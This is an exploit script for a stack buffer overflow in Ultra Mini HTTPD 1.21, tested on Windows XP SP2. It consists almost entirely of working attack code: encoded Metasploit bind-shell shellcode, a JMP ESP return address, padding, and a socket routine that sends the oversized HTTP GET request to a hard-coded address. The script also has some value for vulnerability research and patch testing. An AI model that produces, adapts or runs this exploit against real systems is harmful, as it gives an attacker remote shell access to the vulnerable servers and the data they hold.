# Exploit Title: Ultra Mini HTTPD stack buffer overflow
# Date: 10 July 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP2, English
#
# Description:
# A buffer overflow is triggered when requesting a very long
# resource name.
#
import
socket
import
struct
# msfpayload windows/shell_bind_tcp R | \
# msfencode -b "\x00\x0a\x0d\x20\x0b\x09\x0c"
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode
=
(
"\xba\x1f\xb5\xae\xa1\xdd\xc4\xd9\x74\x24\xf4\x5e\x33\xc9"
+
"\xb1\x56\x31\x56\x13\x83\xc6\x04\x03\x56\x10\x57\x5b\x5d"
+
"\xc6\x1e\xa4\x9e\x16\x41\x2c\x7b\x27\x53\x4a\x0f\x15\x63"
+
"\x18\x5d\x95\x08\x4c\x76\x2e\x7c\x59\x79\x87\xcb\xbf\xb4"
+
"\x18\xfa\x7f\x1a\xda\x9c\x03\x61\x0e\x7f\x3d\xaa\x43\x7e"
+
"\x7a\xd7\xab\xd2\xd3\x93\x19\xc3\x50\xe1\xa1\xe2\xb6\x6d"
+
"\x99\x9c\xb3\xb2\x6d\x17\xbd\xe2\xdd\x2c\xf5\x1a\x56\x6a"
+
"\x26\x1a\xbb\x68\x1a\x55\xb0\x5b\xe8\x64\x10\x92\x11\x57"
+
"\x5c\x79\x2c\x57\x51\x83\x68\x50\x89\xf6\x82\xa2\x34\x01"
+
"\x51\xd8\xe2\x84\x44\x7a\x61\x3e\xad\x7a\xa6\xd9\x26\x70"
+
"\x03\xad\x61\x95\x92\x62\x1a\xa1\x1f\x85\xcd\x23\x5b\xa2"
+
"\xc9\x68\x38\xcb\x48\xd5\xef\xf4\x8b\xb1\x50\x51\xc7\x50"
+
"\x85\xe3\x8a\x3c\x6a\xde\x34\xbd\xe4\x69\x46\x8f\xab\xc1"
+
"\xc0\xa3\x24\xcc\x17\xc3\x1f\xa8\x88\x3a\x9f\xc9\x81\xf8"
+
"\xcb\x99\xb9\x29\x73\x72\x3a\xd5\xa6\xd5\x6a\x79\x18\x96"
+
"\xda\x39\xc8\x7e\x31\xb6\x37\x9e\x3a\x1c\x4e\x98\xf4\x44"
+
"\x03\x4f\xf5\x7a\xb2\xd3\x70\x9c\xde\xfb\xd4\x36\x76\x3e"
+
"\x03\x8f\xe1\x41\x61\xa3\xba\xd5\x3d\xad\x7c\xd9\xbd\xfb"
+
"\x2f\x76\x15\x6c\xbb\x94\xa2\x8d\xbc\xb0\x82\xc4\x85\x53"
+
"\x58\xb9\x44\xc5\x5d\x90\x3e\x66\xcf\x7f\xbe\xe1\xec\xd7"
+
"\xe9\xa6\xc3\x21\x7f\x5b\x7d\x98\x9d\xa6\x1b\xe3\x25\x7d"
+
"\xd8\xea\xa4\xf0\x64\xc9\xb6\xcc\x65\x55\xe2\x80\x33\x03"
+
"\x5c\x67\xea\xe5\x36\x31\x41\xac\xde\xc4\xa9\x6f\x98\xc8"
+
"\xe7\x19\x44\x78\x5e\x5c\x7b\xb5\x36\x68\x04\xab\xa6\x97"
+
"\xdf\x6f\xd6\xdd\x7d\xd9\x7f\xb8\x14\x5b\xe2\x3b\xc3\x98"
+
"\x1b\xb8\xe1\x60\xd8\xa0\x80\x65\xa4\x66\x79\x14\xb5\x02"
+
"\x7d\x8b\xb6\x06"
)
# 7C941EED , JMP ESP , ntdll.dll
payload
=
"A"
*
5392
+
struct.pack(
"<I"
,
0x7C941EED
)
payload
+
=
"\x81\xc4\xf0\xea\xff\xff"
+
shellcode
+
"B"
*
4230
print
"[+] sending payload, length"
,
len
(payload)
s
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((
"192.168.37.175"
,
80
))
buf
=
(
"GET /"
+
payload
+
" HTTP/1.1\r\n"
+
"Host: 192.168.37.175"
+
"\r\n\r\n"
)
s.send(buf)
s.close()